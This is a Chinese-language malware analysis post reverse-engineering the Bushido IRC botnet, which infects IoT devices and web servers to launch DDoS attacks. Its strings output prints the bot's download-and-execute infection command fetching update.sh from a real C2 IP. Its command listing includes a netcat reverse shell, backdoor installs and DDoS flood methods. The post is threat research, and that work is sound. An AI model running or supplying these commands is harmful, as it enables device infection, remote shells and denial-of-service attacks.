逆向 Bushido IOT 僵尸網絡
責編:gltian |2018-09-06 10:50:57這篇文章介紹一個代號為 Bushido 的僵尸網絡,這個僵尸網絡既可以控制 IOT 設備發動 DDOS 攻擊,也可以控制 web 服務器發動 DDOS 攻擊,本文介紹該惡意軟件的感染行為,也會嘗試分析該惡意軟件背后的作者。
感謝 MalwareMustDie 提供本次分析的初始腳本,簡單來說,這些腳本的功能是從服務器下載若干可執行文件然后執行他們,針對不同平臺會下載對應的可執行文件,如下:
在這篇文章里我們選擇了64位的 ELF 樣本進行逆向分析,其他平臺的樣本邏輯功能是一樣的。
惡意樣本
首先,列一下最后分析出來的該僵尸網路所有的文件
| FILE HASH VALUE | FILE NAME | FUNCTION |
|---|---|---|
| 4c1ff6424e1d47921a9c3822c67b6d288e67781d22ee1bc4f82fc11509bfb479 | a09rndgxtx | botnet binary |
| 40a9be5a72284a14939271e244a9904142c7e87e64d2b1a476b51d36c5f2de26 | a88hfdje8 | botnet binary |
| f4bed53e2a0d273f00e82825607164ad20caa5f1a02e48e4b5627a819f49df8b | ab89484bdhd | botnet binary |
| d12ffbef4d85806d77294377956c4ecc48ac9b8c3bddbf26a917723f80c719fb | adjde99vhc | botnet binary |
| c1b12ad1eb4e64896a66dc9b4e83f0e3a7d2d4c79819b68853f0f64fd329ac83 | adjs8993bd | botnet binary |
| 37ac5b9aef6955a7a393d87ee656656851c313896fdeaff3b591e68ebda7a21d | agf63683gd | botnet binary |
| 5a8a8ea38ac8202373474e5ce535efd2302543a5aa595aa00bd3b553467ffd34 | alfkdcj9e8 | botnet binary |
| fd171c6b8f870bf64885cb05a5f1da3581537810652a9714a592c21889722198 | alo99edgwu | botnet binary |
| 9bad4e105c1701c965fd65118a14e06d222ca13eb9adb3c9e1e4fd7a80374087 | apr98dgs5c | botnet binary |
| ca5bb4a794663f35c1ded854e5157e8d077624501514ecac329be7ada8e0248c | aqerd783nd | botnet binary |
| 7c492dde22c828fffc3067ef6aaa5d466cab76858079ce57492ce9bbfd7e449a | atyur7837s | botnet binary |
| 5fb8b5590b4845b31988f636a5a09b02bdbb3e730dd1f78d8f04a02013cb760d | ambvjcv9e0 | botnet binary |
| 70d7adcd931eb49ede937b64f1653a6710fbcea891e2ab186165cff1d3429945 | 8UsA1.sh | infection script |
| 36f38298c5345abf9f0036890b357610078327a4a0a0e61db79fe7afb591830d | update.sh | infection script |
| eabee288c9605b29f75cd23204b643cfe4d175851b7d57c3d3d73703bd0f8ec8 | ftp1.sh | download the malware samples via ftp and install it |
| 2544f0299a5795bf12494e2cbe09701cb024b06a0b924c91de0d35efb955a5fe | pma.php | php botnet more on it in later section |
| 18d6a4280adf67e2adf7a89aa11faa93a5ed6fc9d64b31063386d762b92b45d3 | pma.pl | pearl botnet more on it in later section |
靜態分析
64位平臺的二進制文件是 ambvjcv9e0 這個文件,首先,查看它的文件信息
$ file ambvjcv9e0
ambvjcv9e0: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
如上,這是一個64位的elf文件,接下去我們查看 elf 頭信息
readelf -h x64_ambvjcv9e0
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
Data: 2s complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: EXEC (Executable file)
Machine: Advanced Micro Devices X86-64
Version: 0x1
Entry point address: 0x400194
Start of program headers: 64 (bytes into file)
Start of section headers: 120288 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 56 (bytes)
Number of program headers: 3
Size of section headers: 64 (bytes)
Number of section headers: 15
Section header string table index: 12
然后,查看 elf 文件的程序頭
$ readelf -l ambvjcv9e0
Elf file type is EXEC (Executable file)
Entry point 0x400194
There are 3 program headers, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
LOAD 0x0000000000000000 0x0000000000400000 0x0000000000400000
0x000000000001b50c 0x000000000001b50c R E 0x100000
LOAD 0x000000000001b510 0x000000000051b510 0x000000000051b510
0x0000000000001418 0x00000000000094a0 RW 0x100000
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 0x8
Section to Segment mapping:
Segment Sections...
00 .init .text .fini .rodata .eh_frame
01 .ctors .dtors .jcr .data .bss
02
如上,沒有 dynamic section 和 INTERP section, 接下去我們查看詳細的 section 表
$ readelf -S ambvjcv9e0
There are 15 section headers, starting at offset 0x1d5e0:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .init PROGBITS 00000000004000e8 000000e8
0000000000000013 0000000000000000 AX 0 0 1
[ 2] .text PROGBITS 0000000000400100 00000100
0000000000015138 0000000000000000 AX 0 0 16
[ 3] .fini PROGBITS 0000000000415238 00015238
000000000000000e 0000000000000000 AX 0 0 1
[ 4] .rodata PROGBITS 0000000000415260 00015260
00000000000062a6 0000000000000000 A 0 0 32
[ 5] .eh_frame PROGBITS 000000000041b508 0001b508
0000000000000004 0000000000000000 A 0 0 4
[ 6] .ctors PROGBITS 000000000051b510 0001b510
0000000000000010 0000000000000000 WA 0 0 8
[ 7] .dtors PROGBITS 000000000051b520 0001b520
0000000000000010 0000000000000000 WA 0 0 8
[ 8] .jcr PROGBITS 000000000051b530 0001b530
0000000000000008 0000000000000000 WA 0 0 8
[ 9] .data PROGBITS 000000000051b540 0001b540
00000000000013e8 0000000000000000 WA 0 0 32
[10] .bss NOBITS 000000000051c940 0001c928
0000000000008070 0000000000000000 WA 0 0 32
[11] .comment PROGBITS 0000000000000000 0001c928
0000000000000c4e 0000000000000000 0 0 1
[12] .shstrtab STRTAB 0000000000000000 0001d576
0000000000000066 0000000000000000 0 0 1
[13] .symtab SYMTAB 0000000000000000 0001d9a0
0000000000005418 0000000000000018 14 290 8
[14] .strtab STRTAB 0000000000000000 00022db8
00000000000029a2 0000000000000000 0 0 1
如上,這個elf文件是靜態鏈接的,而且沒有消除符號,所以我們可以用 readelf 讀取符號表
$ readelf -s ambvjcv9e0
318: 000000000040bc46 485 FUNC GLOBAL DEFAULT 2 popen
319: 0000000000407ca5 177 FUNC GLOBAL DEFAULT 2 botkill
320: 0000000000411484 351 FUNC GLOBAL DEFAULT 2 sysconf
322: 000000000040b7d8 15 FUNC GLOBAL DEFAULT 2 vsprintf
323: 0000000000410ab4 72 FUNC GLOBAL DEFAULT 2 random
324: 0000000000411ad0 19 FUNC GLOBAL HIDDEN 2 __GI_getpagesize
325: 000000000040dd60 54 FUNC GLOBAL HIDDEN 2 __GI_strdup
326: 000000000040b43c 35 FUNC GLOBAL DEFAULT 2 getdtablesize
328: 0000000000405c17 33 FUNC GLOBAL DEFAULT 2 contains_fail
329: 000000000040037f 286 FUNC GLOBAL DEFAULT 2 Send
330: 0000000000414c50 19 FUNC GLOBAL HIDDEN 2 __length_question
332: 000000000040877a 1608 FUNC GLOBAL DEFAULT 2 hackpkg
333: 00000000004130c4 115 FUNC GLOBAL DEFAULT 2 setservent
334: 000000000040dce8 48 FUNC GLOBAL HIDDEN 2 __GI_strcasecmp
335: 0000000000411cd0 30 FUNC GLOBAL HIDDEN 2 __GI_tolower
336: 000000000040d3a8 192 FUNC GLOBAL DEFAULT 2 putc_unlocked
337: 000000000040fad4 11 FUNC WEAK DEFAULT 2 recv
338: 000000000040fa48 43 FUNC WEAK DEFAULT 2 connect
339: 0000000000414c00 80 FUNC GLOBAL HIDDEN 2 __encode_question
340: 00000000004115e4 70 FUNC GLOBAL HIDDEN 2 __GI___uClibc_fini
342: 0000000000414ab8 163 FUNC GLOBAL HIDDEN 2 __encode_header
343: 0000000000413234 233 FUNC GLOBAL DEFAULT 2 getservbyname_r
344: 0000000000414a40 119 FUNC GLOBAL HIDDEN 2 __GI_strncat
345: 000000000041162a 3 FUNC WEAK DEFAULT 2 __pthread_mutex_lock
346: 000000000040fc98 30 FUNC GLOBAL DEFAULT 2 __sigdelset
下面我們讀取以 ‘.c’ 結束的符號
$ readelf -s x64_ambvjcv9e0 | grep -F .c
16: 0000000000000000 0 FILE LOCAL DEFAULT ABS crtstuff.c
26: 0000000000000000 0 FILE LOCAL DEFAULT ABS crtstuff.c
32: 0000000000000000 0 FILE LOCAL DEFAULT ABS initfini.c
35: 0000000000000000 0 FILE LOCAL DEFAULT ABS Bushido-IRC.c
50: 0000000000000000 0 FILE LOCAL DEFAULT ABS __syscall_fcntl.c
51: 0000000000000000 0 FILE LOCAL DEFAULT ABS _exit.c
52: 0000000000000000 0 FILE LOCAL DEFAULT ABS close.c
53: 0000000000000000 0 FILE LOCAL DEFAULT ABS fork.c
54: 0000000000000000 0 FILE LOCAL DEFAULT ABS getdtablesize.c
55: 0000000000000000 0 FILE LOCAL DEFAULT ABS getpid.c
56: 0000000000000000 0 FILE LOCAL DEFAULT ABS getppid.c
57: 0000000000000000 0 FILE LOCAL DEFAULT ABS getrlimit.c
58: 0000000000000000 0 FILE LOCAL DEFAULT ABS ioctl.c
59: 0000000000000000 0 FILE LOCAL DEFAULT ABS kill.c
發現了一個有趣的文件 Bushido-IRC.c(本僵尸網絡名字的來源),更有意思的是,接下去我發現不需要用反編譯的手段,直接用 strings 工具就可以發現該惡意樣本的很多有用信息
$ strings ambvjcv9e0
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://80.93.187.211/update.sh -O update.sh; busybox wget http://80.93.187.211/update.sh -O update.sh; ftpget
-v -u anonymous -p anonymous -P 21 80.93.187.211 update.sh update.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 80.93.187.211 update.sh update.sh; chmod 777 upd
ate.sh; ./update.sh; rm -rf update.sh
mirai.*
dlr.*mips
mips64
mipsel
sh2eb
sh2elf
armv5
armv4tl
armv4
armv6
i686
powerpc
通過瀏覽 strings 輸出我發現了該樣本的有趣信息:
- CNC 服務器的 IP 地址
- telnet 服務的賬號和密碼
- 若干 HTTP headers 相關的字符串
- 若干 user agent 相關的字符串
- 大量種族主義的言論
- 大量IRC命令和相關字符串
- 惡意軟件使用說明
- 惡意軟件更新命令和大量其他命令
- 錯誤處理相關的字符串
- libc 庫函數名
- nmap 掃描命令
- 編譯腳本的名字
通過上述字符串可以大概判斷本惡意軟件的功能,但是為了搞清楚其工作流程,以及如何與 CNC 服務器連接,我們需要深入分析,由于我們已經知道了 ip 地址,我們可以直接對 CNC 服務器做端口掃描
掃描服務器
從可執行文件里得到CNC服務器ip地址后,很自然而然就會進行端口掃描,通過掃描我得到以下結果
1,服務器A(ip 80.93.187.211)
21/tcp open ftp
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 b3:ae:e9:79:22:65:37:15:13:66:c8:8f:0a:81:13:ec (DSA)
|_ 2048 32:e9:e2:9f:9b:ae:13:e6:99:7a:60:91:9c:38:30:8d (RSA)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Apache HTTP Server Test Page powered by CentOS
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
443/tcp open https?
445/tcp filtered microsoft-ds
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc UnrealIRCd
| irc-info:
| users: 57
| servers: 1
| chans: 3
| lusers: 57
| lservers: 0
| server: irc.NulL
| version: Unreal3.2.10.6. irc.NulL
| source ident: nmap
| source host: 19A967F7.1F3B5440.6D396E3B.IP
|_ error: Closing Link: kksqfgqca[114.143.107.254] (Client has disconnected from ZullSec)
根據掃描結果可以得到下面的結論:
- 這是基于 IRC 的 CNC 服務器
- ftp 服務可能可以使用:進一步地,我使用默認ftp賬號和密碼(anonymous)成功登錄了該ftp服務,登錄了ftp服務之后,就可以得到我們前面提到的所有文件,在其中一個腳本文件 8UsA1.sh 里,我們發現它還連接了另外一個ip地址: 185.244.25.217
2, 服務器B(ip 185.244.25.217)
這個ip是從文件 8UsA1.sh 里發現的,對它進行 nmap 端口掃描,可惜沒發現啥有意思的東西,它只開放了一個 HTTP 服務
80/tcp open http
443/tcp open https
Running: Linux 2.6.X
OS details: Linux 2.6.18 - 2.6.22
CNC服務器
從上述分析我得出結論,這個惡意樣本是通過服務器A基于 IRC 控制的僵尸網絡,使用IRC客戶端鏈接CNC服務器后可以發現有兩個頻道
- pma – 惡意腳本感染了web服務器后會通過 IRC 加入 CNC 服務器的這個頻道
- zull – 惡意二進制感染了iot設備后通過 IRC 加入 CNC 服務器的這個頻道
IRC服務器
經過分析,惡意終端連接 IRC 服務的命令格式如 “NICK[ZULL|x86_64]ZM5z”, 這個命令表示惡意樣本 NICK[] 加入 IRC 頻道 #zull, 使用的密碼是寫死在可執行文件里的,如下
惡意終端的功能
通過分析可以知道惡意樣本具備以下能力:
- DDOS 攻擊,這是主要功能,集成了多種 DDOS 攻擊,如 ICMP flood, TCP/UDP flood
- 惡意終端可以被 CNC 遠程關閉,這個關閉惡意終端的命令的密碼是: “FreakIsYourGod!!!”,也是寫死在二進制里的,如下
- 惡意終端可以從服務器下載新的可執行文件,也可以下載源碼然后自己編譯出可執行文件
- 惡意終端可以跳轉到新的服務器,如果當前服務器失能
逆向分析發現惡意終端二進制文件存在一個結構體數組,該結構體第一個元素是一個字符串(命令的名稱),第二個元素是一個函數指針(命令的實現函數),這個數組就是指令列表,如下:
小結一下,惡意終端包括運行在 IOT 設備上的可執行文件和運行在web服務器上的腳本,這些惡意終端會連接 IRC 服務器對應的頻道,iot 設備的惡意終端連接 #zull 頻道,web 服務器的惡意終端連接 #pma 頻道,然后等待 IRC 服務器下發指令,這些指令整理如下:
惡意可執行文件擁有的指令
- Non-root/non-spoof DDoS commands commands :
- STD: A non spoof HIV STD flooder
- HOLD: A vanilla TCP connect flooder
- JUNK: A vanilla TCP flooder (modded)
- UNKNOWN<port, 0 for random> <packet size, 0 for random>: An advanced non spoof UDP flooder modified by Freak
- HTTP: An extremely powerful HTTP flooder
- Spoof/root commands :
- UDP: A UDP flooder
- PAN: An advanced syn flooder that will kill most network drivers
- TCP: An advanced TCP flooder with multithreading. Will kill almost any service.
- PHATWONK<flags/method>: A leet flooder coded by Freak, attacks 31 ports. Can set flags or attack method.
- BLACKNURSE: An ICMP packet flooder that will crash most firewalls and use loads of CPU.
- Other commands :
- RNDNICK : Randomizes the knights nick
- NICK: Changes the nick of the client
- SERVER: Changes servers
- GETSPOOFS : Gets the current spoofing
- SPOOFS: Changes spoofing to a subnet
- DISABLE : Disables all packeting from this client
- ENABLE : Enables all packeting from this client
- KILL : Kills the knight
- DNS2IP
- GET: Downloads a file off the web and saves it onto the hd
- UPDATE<src:bin> : Update this bot
- HACKPKG: HackPkg is here! Install a bin, using http, no depends!
- VERSION : Requests version of client
- KILLALL : Kills all current packeting
- HELP : Displays this
- IRC: Sends this command to the server
- SH: Executes a command
- ISH: SH, interactive, sends to channel
- SHD: Executes a psuedo-daemonized command
- GETBB: Get a proper busybox
- INSTALL <http server/file_name> : Download & install a binary to /var/bin
- BASH: Execute commands using bash.
- BINUPDATE http:server/package : Update a binary in /var/bin via wget
- SCAN: Call the nmap wrapper script and scan with your opts.
- RSHELL: Equates to nohup nc ip port -e /bin/sh
- LOCKUP http:server : Kill telnet, d/l aes backdoor from, run that instead.
- GETSSH http:server/dropbearmulti : D/l, install, configure and start dropbear on port 30022.
惡意腳本擁有的指令
- mail [to] [from] [subject] [message]
- dns [host]
- rndnick
- raw [irc] [data]
- uname
- eval [php] [code]
- exec [command] [args]
- cmd [command] [args]
- udpflood [ip] [port] [time] [packet] [size]
- tcpconn [host] [port] [time]
- slowread [host] [port] [page] [sockets] [time]
- slowloris [host] [time]
- l7 method [host] [time]
- post [host] time
- head [host] [time]
- tcpflood [host] [port] [time]
- httpflood [host] [port] [time] [method] [url]
- proxyhttpflood [targetUrl(with http://)] [proxyListUrl] [time] [method]
- cloudflareflood [host] [port] [time] [method] [url] [postFields]
- ud.server [host] [port] [pass] [chan]
惡意樣本背后的人
當我們連接上 IRC 服務器的時候會發現如下信息:
我在 twitter 上搜索以上關鍵字,結果發現了兩個賬號
這些賬號屬于某個稱為 Offsecurity 的組織,我猜測他們試圖將這個僵尸網絡出售,通過一點谷歌搜索我發現了更多信息:
結論
這個惡意軟件并沒有新奇的行為,我猜測它是根據開源工具 Mirai 改的,他們通過控制web服務器和 iot 設備發動 DDOS 攻擊,并通過 IRC 服務器控制所以惡意終端。